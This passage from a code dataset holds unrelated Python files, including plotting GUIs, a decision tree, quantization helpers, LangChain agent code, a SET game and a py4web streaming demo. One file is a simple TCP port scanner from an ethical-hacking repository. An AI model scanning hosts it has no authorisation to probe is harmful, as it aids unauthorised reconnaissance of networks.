scale_changed(self, event):\r\n self.s_vals = event.widget.get()\r\n if self.s_vals == 'None':\r\n self.s_vals = None\r\n self.update()\r\n\r\n def err_changed(self, event):\r\n self.e_vals = event.widget.get()\r\n if self.e_vals == 'None':\r\n self.e_vals = None\r\n self.update()\r\n\r\n def __init__(self, parent, p_ax, title):\r\n tk.Frame.__init__(self, parent)\r\n self.ax = p_ax\r\n self.title = title\r\n self.x_vals = None\r\n self.y_vals = None\r\n self.c_vals = None\r\n self.s_vals = None\r\n self.e_vals = None\r\n self.series = SeriesManager(self)\r\n\r\n ttk.Label(self, text=\"X Parameter: \").grid(column=0, row=0, sticky='W')\r\n cb1 = ttk.Combobox(self, values=Dataset.get_numerical_columns() + Dataset.get_categorical_columns(), width=30)\r\n cb1.bind('<>', self.x_changed)\r\n cb1.grid(column=1, row=0)\r\n\r\n ttk.Label(self, text=\"Y Parameter: \").grid(column=0, row=1, sticky='W')\r\n cb2 
= ttk.Combobox(self, values=Dataset.get_numerical_columns(), width=30)\r\n cb2.bind('<>', self.y_changed)\r\n cb2.grid(column=1, row=1)\r\n\r\n ttk.Label(self, text=\"Fehlerbalken: \").grid(column=0, row=2, sticky='W')\r\n cb_4 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb_4.bind('<>', self.err_changed)\r\n cb_4.set('None')\r\n cb_4.grid(column=1, row=2)\r\n\r\n ttk.Label(self, text=\"Farbwert: \").grid(column=0, row=3, sticky='W')\r\n cb5 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb5.bind('<>', self.color_changed)\r\n cb5.set('None')\r\n cb5.grid(column=1, row=3)\r\n\r\n ttk.Label(self, text=\"Größenwert: \").grid(column=0, row=4, sticky='W')\r\n cb6 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb6.bind('<>', self.scale_changed)\r\n cb6.set('None')\r\n cb6.grid(column=1, row=4)\r\n\r\n ttk.Label(self, text=\"Reihenmanager: \").grid(column=0, row=5, sticky='W')\r\n tk.Button(self, text=\"Datenfilter\", width=28, command=lambda: self.series.open()).grid(column=1, row=5)\r\n\r\n\r\nclass HistogramWindow:\r\n def __init__(self):\r\n pass\r\n\r\n\r\nclass BarPlotWindow:\r\n def __init__(self):\r\n pass\r\n\r\n\r\nclass Filtertool:\r\n figures = []\r\n\r\n def __hover(self, evnt):\r\n if evnt.inaxes is None:\r\n return\r\n text = \"\"\r\n for idx, col in enumerate(evnt.inaxes.collections):\r\n cont, ind = col.contains(evnt)\r\n if cont:\r\n tup = evnt.inaxes._custom_label_data[col]\r\n text += str(pd.concat([tup[0], tup[1]], axis=1).iloc[ind['ind']])\r\n if text == \"\":\r\n return\r\n print(text)\r\n\r\n def __cb(self):\r\n pass\r\n\r\n def add_2d_scatter(self, notebook, title):\r\n n = len(self.figure.axes)\r\n x = (math.floor(math.sqrt(n))+1)\r\n gs = gridspec.GridSpec(nrows=x, ncols=x, figure=self.figure)\r\n for i, ax in enumerate(self.figure.axes):\r\n pos = gs[i // x, i % x].get_position(self.figure)\r\n ax.set_position(pos)\r\n ax.set_subplotspec(gs[i])\r\n ax = self.figure.add_subplot(gs[n // x, n % x])\r\n if len(title) == 0:\r\n title = \"2D Scatter\"\r\n title = f\"{title} {len(Filtertool.figures)}\"\r\n tab = Scatter2DWindow(notebook, ax, title)\r\n Filtertool.figures.append(tab)\r\n notebook.add(tab, text=title)\r\n plt.show()\r\n\r\n def add_3d_scatter(self, notebook, title):\r\n n = len(self.figure.axes)\r\n x = (math.floor(math.sqrt(n))+1)\r\n gs = gridspec.GridSpec(nrows=x, ncols=x, figure=self.figure)\r\n for i, ax in enumerate(self.figure.axes):\r\n pos = gs[i // x, i % x].get_position(self.figure)\r\n ax.set_position(pos)\r\n ax.set_subplotspec(gs[i])\r\n ax = self.figure.add_subplot(gs[n // x, n % x], projection='3d')\r\n if len(title) == 0:\r\n title = \"3D Scatter\"\r\n title = f\"{title} {len(Filtertool.figures)}\"\r\n tab = Scatter3DWindow(notebook, ax, title)\r\n Filtertool.figures.append(tab)\r\n notebook.add(tab, text=title)\r\n plt.show()\r\n\r\n def __init__(self, fig):\r\n self.figure = fig\r\n # fig.canvas.mpl_connect(\"motion_notify_event\", self.__hover)\r\n\r\n self.exp = tk.Toplevel(self.figure.canvas.get_tk_widget())\r\n self.exp.title(\"Dora the Explorer\")\r\n self.exp.geometry(\"300x200\")\r\n self.exp.protocol(\"WM_DELETE_WINDOW\", self.__cb)\r\n tab_ctrl = ttk.Notebook(self.exp)\r\n for tab in Filtertool.figures:\r\n print(tab.title)\r\n\r\n tab1 = ttk.Frame(tab_ctrl)\r\n tk.Label(tab1, text='Titel: ').grid(column=0, row=0, sticky='W')\r\n e1 = tk.Entry(tab1, width=30)\r\n\r\n tk.Label(tab1, text='2D Scatter Plot: 
').grid(column=0, row=1, sticky='W')\r\n b0 = tk.Button(tab1, text=\"Add\", width=30, command=lambda: self.add_2d_scatter(tab_ctrl, e1.get()))\r\n b0.grid(column=1, row=1, sticky='W')\r\n\r\n tk.Label(tab1, text='3D Scatter Plot: ').grid(column=0, row=2, sticky='W')\r\n b1 = tk.Button(tab1, text=\"Add\", width=30, command=lambda: self.add_3d_scatter(tab_ctrl, e1.get()))\r\n b1.grid(column=1, row=2, sticky='W')\r\n\r\n tk.Label(tab1, text='Histogram: ').grid(column=0, row=3, sticky='W')\r\n tk.Button(tab1, text=\"Add\", width=30).grid(column=1, row=3, sticky='W')\r\n\r\n tk.Label(tab1, text='Bar Plot: ').grid(column=0, row=4, sticky='W')\r\n tk.Button(tab1, text=\"Add\", width=30).grid(column=1, row=4, sticky='W')\r\n\r\n tk.Label(tab1, text='Boxplot: ').grid(column=0, row=5, sticky='W')\r\n tk.Button(tab1, text=\"Add\", width=30).grid(column=1, row=5, sticky='W')\r\n\r\n e1.grid(column=1, row=0)\r\n\r\n tab_ctrl.add(tab1, text='+')\r\n tab_ctrl.pack(expand=1, fill=\"both\")\r\n\r\n\r\nif __name__ == '__main__':\r\n fig = plt.figure(constrained_layout=True)\r\n data = Dataset()\r\n controll_panel = Filtertool(fig)\r\n plt.show()\r\n\r\n","repo_name":"LabC0de/DorPHA","sub_path":"Refrac.py","file_name":"Refrac.py","file_ext":"py","file_size_in_byte":23158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"41292972497","text":"# this tool is same like a nmap to scan port hosting sites\r\nimport socket\r\n\r\ntargets = input(\"[*] Enter target to scan (split them with ,)\")\r\nports = int(input(\"[*] Enter how many ports you want to scan \"))\r\n\r\n\r\ndef scan_port(ipaddress, port):\r\n try:\r\n # socket/post ae those that host a website\r\n sock = socket.socket()\r\n # sock to conect needs two parameter\r\n sock.connect((ipaddress, port))\r\n # if we manage to connect then the port is open and if we dont then the port is closed\r\n print(\"[+] Port Open \" + str(port))\r\n socket.close()\r\n except:\r\n print(\"[-] Port Close \" + str(port))\r\n\r\n\r\ndef scan(target, ports):\r\n for port in range(1, ports):\r\n scan_port(target, port)\r\n\r\n\r\nif ',' in targets:\r\n # if multiple targets are to scan\r\n for ipadd in targets.split(','):\r\n scan(ipadd.strip(' '), ports)\r\nelse:\r\n scan(targets, ports)\r\n","repo_name":"SKAZIPSY/pythonEthicalHacking","sub_path":"postscanner.py","file_name":"postscanner.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9429314706","text":"# %%\r\nimport numpy as np\r\nfrom typing import List\r\n\r\n\r\nclass TauTree():\r\n \"\"\"\r\n Attribute\r\n ---------\r\n\r\n tree:\r\n tree of decision rules, (ith dimension, criterion)\r\n go left if Xi < criterion.\r\n (1, 2.2)\r\n / \\ \r\n (0, 8.1) (3, 7.2)\r\n ...\r\n \r\n \r\n \"\"\"\r\n\r\n def __init__(self, depth=4, min_split=2):\r\n self.sgn_matrix = None\r\n self.depth = depth\r\n self.n_split = 2**self.depth - 1 # number of non-leaf nodes in tree\r\n self.min_split = min_split\r\n\r\n def fit(self, X, y):\r\n \"\"\"\r\n X, np.array:\r\n shape = (n, d)\r\n \"\"\"\r\n self.n, self.dim = X.shape\r\n self.sgn_matrix, self.orders = self.precompute(X, y)\r\n self.y = y\r\n \r\n self.tree = [] # list(binary tree) of tuples of (dim to split, stump)\r\n self.leaf_members = [ # list(binary tree) of List[int(id)]\r\n list(range(self.n)) # all belongs to root\r\n ]\r\n\r\n # split every leaf\r\n for leaf_ind in range(self.n_split): # binary tree leaf 
id\r\n\r\n if not self.can_split(leaf_ind):\r\n self.not_split()\r\n continue\r\n \r\n dim, left, right = self.best_split(\r\n sign_matrix=self.sgn_matrix,\r\n order_list=self.orders,\r\n members=self.leaf_members[leaf_ind]\r\n )\r\n \r\n # found best split for ith leaf...\r\n self.leaf_members.extend( [ left, right ] )\r\n boundary = [ left[-1], right[0] ]\r\n self.tree.append(\r\n ( dim, X[boundary, dim].mean() ) # middle point as stump\r\n )\r\n \r\n \r\n def predict(self, X, estimate_func=np.median, min_df=1):\r\n \r\n estimations = np.array([\r\n ( estimate_func( self.y[leaf_member] ) \r\n if len(leaf_member) >= min_df \r\n else 0 )\r\n for leaf_member in self.leaf_members\r\n ])\r\n\r\n group = np.zeros(X.shape[0], dtype=np.int)\r\n\r\n for leaf_ind, (dim, stump) in enumerate(self.tree):\r\n member = (group == leaf_ind)\r\n val = X[member, dim]\r\n\r\n new_group = np.where(\r\n val < stump, 2*leaf_ind+1, 2*leaf_ind+2\r\n )\r\n new_group[ np.isnan(val) ] = leaf_ind\r\n\r\n group[member] = new_group\r\n\r\n return estimations[group]\r\n\r\n\r\n @staticmethod\r\n def precompute(X, y):\r\n y = np.array(y).reshape(-1, 1)\r\n # equilavent to sgn_matrix = np.sign(y - y.T)\r\n sgn_matrix = (y > y.T).astype(np.int8)\r\n sgn_matrix[y < y.T] = -1\r\n\r\n order_list = [\r\n np.argsort(Xd)\r\n for Xd in X.T\r\n ]\r\n return sgn_matrix, order_list\r\n\r\n\r\n @staticmethod\r\n def best_split(sign_matrix, order_list, members: List[int]):\r\n maximum = -1\r\n # iterate all dimensions\r\n for d, order in enumerate(order_list):\r\n sub_order = order[ np.isin(order, members) ] # subsequence\r\n abs_tau = np.abs(\r\n sign_matrix[np.ix_(sub_order, sub_order)]\r\n .sum(axis=1)\r\n .cumsum()\r\n )\r\n max_tau = abs_tau.max()\r\n if maximum < max_tau:\r\n maximum, dim = max_tau, d\r\n size_left = abs_tau.argmax() + 1\r\n left, right = np.split( sub_order, [size_left] )\r\n\r\n return dim, left, right\r\n\r\n\r\n def can_split(self, leaf_ind):\r\n size = len(self.leaf_members[leaf_ind])\r\n if (size == 0):\r\n return False\r\n elif (self.min_split != None) and (size < self.min_split):\r\n return False\r\n else:\r\n return True\r\n\r\n\r\n def not_split(self):\r\n self.leaf_members.extend( [ [], [] ] )\r\n self.tree.append( None )\r\n","repo_name":"yogacha/Non-parametric-Decision-Tree","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"30432858832","text":"import torch.nn as nn\nimport torch\nimport time \nimport os\nimport csv\n\nclass ModelQuantization(nn.Module):\n def __init__(self,model):\n super(ModelQuantization,self).__init__()\n \n # Inserting a quantization operator before the input\n self.quantstub = torch.quantization.QuantStub()\n \n # Inserting a dequantization operator after the output\n self.dequantstub = torch.quantization.DeQuantStub()\n \n # Original floating point model\n self.model = model\n\n def forward(self, x):\n # Floating values to integer values\n z = self.quantstub(x)\n \n z = self.model(z)\n \n # Integer values to floating values\n z = self.dequantstub(z)\n return z\n \ndef model_calibration(model, data, device):\n \n model = model.to(device)\n model.eval()\n \n for input_values, target_values in data:\n input_values,target_values = input_values.to(device), target_values.to(device)\n \n _ = model(input_values)\n \ndef measure_inference_latency(model,\n device,\n input_size=(1, 3, 32, 32),\n num_samples=100,\n num_warmups=10):\n\n 
model.to(device)\n model.eval()\n\n x = torch.rand(size=input_size).to(device)\n\n with torch.no_grad():\n for _ in range(num_warmups):\n _ = model(x)\n torch.cuda.synchronize()\n\n with torch.no_grad():\n start_time = time.time()\n for _ in range(num_samples):\n _ = model(x)\n torch.cuda.synchronize()\n end_time = time.time()\n elapsed_time = end_time - start_time\n elapsed_time_ave = elapsed_time / num_samples\n\n return elapsed_time_ave\n\n\n\ndef save_model(model, model_name,cpu_latency,gpu_latency,accuracy, is_quantized):\n # specify the path and name of the saved model\n if is_quantized:\n model_name = f\"{model_name}_quantized.pth\"\n else:\n model_name = f\"{model_name}.pth\"\n model_path = f\"/home/sourav/research_project/{model_name}\"\n\n # save the model\n torch.save(model.state_dict(), model_path)\n\n # get the file size of the model in bytes\n file_size = os.path.getsize(model_path)\n\n # convert the file size to MB\n file_size_mb = file_size / (1024 * 1024)\n\n # print the name, quantization status, and file size in MB\n print(f\"Saved model: {model_name} (Quantized: {is_quantized}), File size: {file_size_mb:.2f} MB\")\n \n \n\ndef save_model_and_stats(model, model_name, cpu_latency, accuracy, is_quantized):\n # specify the path and name of the saved model\n if is_quantized:\n model_name = f\"{model_name}_quantized.pth\"\n else:\n model_name = f\"{model_name}.pth\"\n model_path = f\"/home/sourav/research_project/{model_name}\"\n\n # save the model\n torch.save(model.state_dict(), model_path)\n\n # get the file size of the model in bytes\n file_size = os.path.getsize(model_path)\n\n # convert the file size to MB\n file_size_mb = file_size / (1024 * 1024)\n\n # print the name, quantization status, and file size in MB\n print(f\"Saved model: {model_name} (Quantized: {is_quantized}), File size: {file_size_mb:.2f} MB\")\n\n stats_path = \"/home/sourav/research_project/stats.csv\"\n\n \n # check if the stats.csv file exists, create it if it doesn't exist\n if not os.path.exists(stats_path):\n with open(stats_path, mode=\"w\", newline='') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(['Model Name', 'File Size (MB)', 'CPU Latency (ms/sample)', 'Accuracy'])\n\n # append the architecture, model size, latencies, and accuracy to the csv file\n with open(stats_path, mode=\"a\", newline='') as csv_file:\n writer = csv.writer(csv_file)\n model_name_with_quantized = model_name \n writer.writerow([model_name_with_quantized, round(file_size_mb, 2), cpu_latency, accuracy])\n\ndef save_quantized_model(model, model_name, cpu_latency, gpu_latency, accuracy):\n # specify the path and name of the saved model\n model_name = f\"{model_name}_quantized.pth\"\n model_path = f\"/home/sourav/research_project/saved_models/{model_name}\"\n\n # save the quantized model\n torch.save(model.state_dict(), model_path)\n\n # get the file size of the model in bytes\n file_size = os.path.getsize(model_path)\n\n # convert the file size to MB\n file_size_mb = file_size / (1024 * 1024)\n\n # print the name, quantization status, and file size in MB\n print(f\"Saved model: {model_name} (Quantized), File size: {file_size_mb:.2f} MB\")\n\n\ndef measure_latency(model, input_shape):\n input_data = torch.randn(input_shape)\n model.eval() # set model to evaluation mode\n\n # Warm up the model by running it once\n with torch.no_grad():\n _ = model(input_data)\n\n # Measure the inference time\n start_time = time.time()\n with torch.no_grad():\n _ = model(input_data)\n end_time = time.time()\n\n latency = 
end_time - start_time\n print(f\"Inference latency: {latency:.6f} seconds\")\n return latency","repo_name":"souravrai98/Research-Project","sub_path":"quant.py","file_name":"quant.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"40364524442","text":"import setpath\nimport functions\nimport json\nimport re\nregistered=True\n\n\nclass createderivedcolumns(functions.vtable.vtbase.VT): #uses + and : for multiplication\n def VTiter(self, *parsedArgs,**envars):\n largs, dictargs = self.full_parse(parsedArgs)\n\n if 'query' not in dictargs:\n raise functions.OperatorError(__name__.rsplit('.')[-1],\"No query argument \")\n query = dictargs['query']\n\n if 'newSchema' not in dictargs: # einai to neo sxhma pou tha exei o pinakas.\n raise functions.OperatorError(__name__.rsplit('.')[-1],\"No newSchema \")\n newSchema = str(dictargs['newSchema'])\n newSchema = re.split(',',newSchema)\n\n\n newSchema1 =\"\"\n for i in xrange(len(newSchema)):\n newSchema1 += newSchema[i]+\",\"\n newSchema1=newSchema1[:-1]\n yield ([newSchema1],)\n\n\n\n cur = envars['db'].cursor()\n c=cur.execute(query)\n currentSchema1 = cur.getdescriptionsafe()\n currentSchema =[str(x[0]) for x in currentSchema1]\n\n\n for myrow in c:\n myrowresult =\"\"\n for d in xrange(len(newSchema)):\n colval = 1.0\n if \":\" in newSchema[d]:\n elements = re.split(\":\",newSchema[d])\n else:\n elements = [newSchema[d]]\n item=[]\n for e in xrange(len(elements)):\n colname = elements[e]\n\n myindex = currentSchema.index(str(colname))\n colval = colval * float(myrow[myindex])\n myrowresult+=str(colval)+\",\"\n # print myrow\n # print newSchema\n # print \"result\", myrowresult\n\n\n yield tuple([myrowresult[0:-1]],)\n\n\n\n\ndef Source():\n return functions.vtable.vtbase.VTGenerator(createderivedcolumns)\n\n\nif not ('.' in __name__):\n \"\"\"\n This is needed to be able to test the function, put it at the end of every\n new function you create\n \"\"\"\n import sys\n import setpath\n from functions import *\n testfunction()\n if __name__ == \"__main__\":\n reload(sys)\n sys.setdefaultencoding('utf-8')\n import doctest\n doctest.tes\n\n\n\n","repo_name":"madgik/exareme","sub_path":"Exareme-Docker/src/exareme/exareme-tools/madis/src/functionslocal/vtable/createderivedcolumns.py","file_name":"createderivedcolumns.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"45"} +{"seq_id":"29279655768","text":"# 参考自 https://python.langchain.com/en/latest/use_cases/agent_simulations/characters.html\n\nfrom datetime import datetime, timedelta\nfrom typing import List\n# from termcolor import colored\n\n\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.docstore import InMemoryDocstore\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.retrievers import TimeWeightedVectorStoreRetriever\nfrom langchain.vectorstores import FAISS\n\nfrom langchain.experimental.generative_agents import GenerativeAgent, GenerativeAgentMemory\nimport math\nimport faiss\n\nLLM = ChatOpenAI(max_tokens=1500) # Can be any LLM you want.\n\n\ndef relevance_score_fn(score: float) -> float:\n \"\"\"Return a similarity score on a scale [0, 1].\"\"\"\n # This will differ depending on a few things:\n # - the distance / similarity metric used by the VectorStore\n # - the scale of your embeddings (OpenAI's are unit norm. 
Many others are not!)\n # This function converts the euclidean norm of normalized embeddings\n # (0 is most similar, sqrt(2) most dissimilar)\n # to a similarity function (0 to 1)\n return 1.0 - score / math.sqrt(2)\n\n\ndef create_new_memory_retriever():\n \"\"\"Create a new vector store retriever unique to the agent.\"\"\"\n # Define your embedding model\n embeddings_model = OpenAIEmbeddings()\n # Initialize the vectorstore as empty\n embedding_size = 1536\n index = faiss.IndexFlatL2(embedding_size)\n vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {},\n relevance_score_fn=relevance_score_fn)\n return TimeWeightedVectorStoreRetriever(vectorstore=vectorstore, other_score_keys=[\"importance\"], k=15)\n\n\ndef create_agent(name, age, traits, status='N/A', init_obs=[], reflection_threshold=8, verbose=False):\n \"\"\"Create a new agent.\"\"\"\n agent_memory = GenerativeAgentMemory(\n llm=LLM,\n memory_retriever=create_new_memory_retriever(),\n verbose=verbose,\n reflection_threshold=reflection_threshold\n # we will give this a relatively low number to show how reflection works\n )\n\n agent = GenerativeAgent(name=name,\n age=age,\n traits=traits, # You can add more persistent traits here\n status=status,\n # When connected to a virtual world, we can have the characters update their status\n memory_retriever=create_new_memory_retriever(),\n llm=LLM,\n memory=agent_memory\n )\n\n agent_add_memory(agent, init_obs)\n return agent\n\n\ndef summery_agent(agent: GenerativeAgent, force_refresh=False):\n print(agent.get_summary(force_refresh=force_refresh))\n\n\ndef agent_add_memory(agent: GenerativeAgent, observations: List[str]):\n for observation in observations:\n agent.memory.add_memory(observation)\n\n\ndef interview_agent(agent: GenerativeAgent, interview_by: str, message: str) -> str:\n # 这个方法会增加agent的记忆\n new_message = f\"{interview_by} says {message}\"\n return agent.generate_dialogue_response(new_message)[1]\n\n\ndef agent_generate_reaction(agent: GenerativeAgent, observation: str) -> str:\n # 这个方法会增加agent的记忆\n _, reaction = agent.generate_reaction(observation)\n return reaction\n\n\ndef run_conversation(agents: List[GenerativeAgent], initial_observation: str) -> None:\n \"\"\"Runs a conversation between agents.\"\"\"\n _, observation = agents[1].generate_reaction(initial_observation)\n print(observation)\n turns = 0\n while True:\n break_dialogue = False\n for agent in agents:\n stay_in_dialogue, observation = agent.generate_dialogue_response(observation)\n print(observation)\n # observation = f\"{agent.name} said {reaction}\"\n if not stay_in_dialogue:\n break_dialogue = True\n if break_dialogue:\n break\n turns += 1\n","repo_name":"HeGanjie/ai-npc-world","sub_path":"server/agent_logic_helper.py","file_name":"agent_logic_helper.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"45"} +{"seq_id":"42000652471","text":"import random\nimport itertools\nimport __builtin__\nimport pygraphviz as pgv\nfrom draw import *\nfrom pygame.locals import *\n\n__builtin__.SET_NUMBER = 3\ncolor_list = ('red', 'green', 'blue')\nsymbol_list = ('diamond', 'squiggle', 'oval')\nshading_list = ('solid', 'striped', 'open')\nnumber_list = ('one', 'two', 'three')\nfeature_list = (color_list, symbol_list, shading_list, number_list)\nfeatures = ('color', 'symbol', 'shading', 'number')\n\ndef deck_generator():\n '''\n Deck generator deck_generator()\n '''\n deck = []\n base = [range(len(feature)) for 
feature in feature_list]\n tally_counter = itertools.product(*base)\n for value in tally_counter:\n card_features = itertools.imap(lambda f, g: f[g], feature_list, value)\n card = dict([pair for pair in zip(features, card_features)])\n deck.append(card)\n return deck\n\ndef take_cards(deck, counter):\n '''\n Taking cards take_cards(deck, counter)\n '''\n cards = []\n while deck and counter != 0:\n cards.append(deck.pop(-1))\n counter -= 1\n return cards\n\ndef is_set(cards):\n '''\n Set verificaton is_set(cards)\n '''\n if len(cards) != SET_NUMBER: return False\n confirm = True\n for feature in features:\n feature_set = set([])\n for card in cards:\n feature_set |= set([card[feature]])\n if 1 < len(feature_set) < SET_NUMBER:\n confirm = False\n break\n return confirm\n\ndef search_set(cards):\n '''\n Set searching search_set(cards)\n '''\n ids = []\n sets = []\n n = len(cards)\n if n < SET_NUMBER: return sets, ids\n for indexes in itertools.combinations(range(n), SET_NUMBER):\n multiplet = [cards[i] for i in indexes]\n if is_set(multiplet):\n ids.append(indexes)\n sets.append(multiplet)\n return sets, ids\n\ndef copy_cards(cards):\n '''\n Copying cards copy_cards(cards)\n '''\n copied_cards = []\n for card in cards:\n copied_cards.append(card.copy())\n return copied_cards\n\ndef graph_generator(cards):\n '''\n Graph generator graph_generator(cards)\n '''\n sets = search_set(cards)\n graph = pgv.AGraph()\n graph.add_nodes_from(sets)\n for a in sets:\n for b in sets:\n is_break = False\n for card_a in a:\n for card_b in b:\n if set(card_a.items()) - set(card_b.items()) == set([]):\n is_break = True\n graph.add_edge(a, b)\n graph.add_edge(b, a)\n break\n if is_break: break\n # removing self-loops\n for node in graph.iternodes():\n graph.delete_edge(node, node)\n return graph\n\ndef topology_sort(graph):\n '''\n WTF?\n '''\n disjointed = 0\n while graph:\n topology = []\n for node in graph.iternodes():\n topology.append((node, len(graph.neighbors(node))))\n topology.sort(key = lambda x: x[1])\n extracted_node = topology[0][0]\n for neighbor in graph.neighbors(extracted_node):\n graph.delete_node(neighbor)\n graph.delete_node(extracted_node)\n disjointed += 1\n return disjointed\n","repo_name":"sergey-lebedev/set","sub_path":"game/set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"27841076199","text":"class Solution:\n \"\"\"\n @param grid: a list of lists of integers.\n @return: An integer, minimizes the sum of all numbers along its path\n \"\"\"\n def minPathSum(self, grid):\n for i in xrange(len(grid)):\n for j in xrange(len(grid[i])):\n if i > 0 and j > 0:\n grid[i][j] += min(grid[i - 1][j], grid[i][j - 1])\n elif i > 0:\n grid[i][j] += grid[i - 1][j]\n elif j > 0:\n grid[i][j] += grid[i][j - 1]\n return grid[-1][-1]\n","repo_name":"yuhanlyu/Snippets","sub_path":"lintcode/minimum_path_sum.py","file_name":"minimum_path_sum.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"45"} +{"seq_id":"28714747695","text":"import cv2\nimport gradio as gr\n\nface_cascade = cv2.CascadeClassifier(\"files/haarcascade_frontalface_default.xml\")\n\ndef detect_faces(image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x,y,w,h) in faces:\n cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)\n return cv2.cvtColor(image, 
cv2.COLOR_BGR2RGB)\n\niface = gr.Interface(fn=detect_faces, inputs=\"image\", outputs=\"image\")\n\niface.launch()\n\n","repo_name":"fabriceDurand/Computer-vision","sub_path":"Web app - detection/gradimage.py","file_name":"gradimage.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"22351391447","text":"from py4web import action, request, response, abort, redirect, URL\nimport os, sys\n\nfrom math import sqrt\nfrom time import sleep\nfrom datetime import datetime\nimport json\nimport threading\nimport uuid\nfrom itertools import count\n\nunique_num = count(start=0, step = 1) \n\n\nclass SafeList:\n def __init__(self):\n self._list = list()\n self._lock = threading.Lock()\n\n def append(self, value):\n with self._lock:\n self._list.append(value)\n\n def check(self, value):\n with self._lock:\n return value in self._list\n\n def remove(self, value):\n with self._lock:\n self._list.remove(value)\n\n def pop(self):\n with self._lock:\n return self._list.pop()\n\n def get(self, index):\n with self._lock:\n return self._list[index]\n\n def length(self):\n with self._lock:\n return len(self._list)\n\nyield_id_list = SafeList()\n\n# ---------------------------------------------------------------------------\n\n# https://gist.github.com/platdrag/e755f3947552804c42633a99ffd325d4\n\nclass threadsafe_iter:\n \"\"\"Takes an iterator/generator and makes it thread-safe by\n serializing call to the `next` method of given iterator/generator.\n \"\"\"\n\n def __init__(self, it):\n self.it = it\n self.lock = threading.Lock()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n with self.lock:\n return self.it.__next__()\n\n\ndef threadsafe_generator(f):\n \"\"\"A decorator that takes a generator function and makes it thread-safe.\"\"\"\n\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n\n return g\n# ------------------------------------------------------------------------\n\ndef threads_info():\n print ( f\"========== {sys._getframe().f_code.co_name}\" )\n\n #print (sys._current_frames().values() )\n f = list(sys._current_frames().values())[0]\n print (\" \",f.f_back.f_globals['__file__'] )\n print (\" \", f.f_back.f_globals['__name__'] )\n getframe_expr = \"sys._getframe({}).f_code.co_name\"\n caller = eval(getframe_expr.format(2))\n callers_caller = eval(getframe_expr.format(3))\n print(\" -- called from: \", caller)\n print(\" \", caller, \"was called from: \", callers_caller, \"--\")\n\n print(\" name: \",threading.current_thread().name)\n print(\" ident: \",threading.get_ident())\n _ = [ print(' ',thread.name) for thread in threading.enumerate() ]\n\n# ------------------------------------------------------------------------\n\n@action(\"polling/stream_sqrt_id_data\", method=[\"GET\", ])\ndef stream_sqrt_id_data():\n\n gen_id = str(next(unique_num) )\n @threadsafe_generator\n def generate_sqrt():\n\n #threads_info()\n\n try:\n\n yield_id = str(uuid.uuid4())\n yield_id_list.append(yield_id)\n\n for i in range(30):\n\n if not yield_id_list.check(yield_id):\n break\n\n json_data = json.dumps(\n {\n \"time\": datetime.now().strftime(\"%H:%M:%S.%f\")[:-3], \n \"value\": f\"{sqrt(i):.2f}\",\n \"yield_id\": yield_id,\n 'gen_id': gen_id,\n }\n )\n\n response.headers[\"Cache-Control\"] = \"no-store\"\n yield f\"{json_data}\\n\\n\"\n sleep(1)\n\n finally:\n if yield_id_list.check(yield_id):\n yield_id_list.remove(yield_id)\n print ( f\"finally: {sys._getframe().f_code.co_name}; id: {gen_id}\" 
)\n\n return generate_sqrt()\n\n@action(\"polling/sqrt_id_post\", method=[\"POST\"])\ndef sqrt_id_post():\n\n try:\n json_data = json.loads(request.body.read())\n yield_id = json_data.get(\"yield_id\")\n if yield_id_list.check(json_data[\"yield_id\"]):\n yield_id_list.remove(yield_id)\n # print(\"found: \", json_data)\n #else:\n # print(\"not found: \", json_data)\n\n except Exception as ex:\n print(f\"ex! {sys._getframe().f_code.co_name}: \", ex)\n print(sys.exc_info())\n #template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n #message = template.format(type(ex).__name__, ex.args)\n #print (message)\n\n@action(\"polling/stream_sqrt_id\", method=[\"GET\", ])\n@action.uses( \"polling/stream_sqrt_id.html\", )\ndef stream_sqrt_id():\n return dict( stream_url = URL(\"polling/stream_sqrt_id_data\"),\n post_url = URL(\"polling/sqrt_id_post\") )\n","repo_name":"ali96343/lvsio","sub_path":"ssep4w/polling/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"70793111177","text":"import time\nfrom abc import ABC, abstractmethod\nimport json\nfrom json import JSONDecodeError\nfrom pathlib import Path\n\nimport yaml\n\nfrom settings import FIXTURES\nfrom src.vacancies.vacancies import Vacancies\n\n\nclass FileManager(ABC):\n \"\"\"Абстрактный класс для работы с файлами\"\"\"\n def __init__(self, file_name=None) -> None:\n \"\"\"\n Инициализация\n :param file_name: Имя файла (объект Path или имя файла строкой, который будет находится в папке 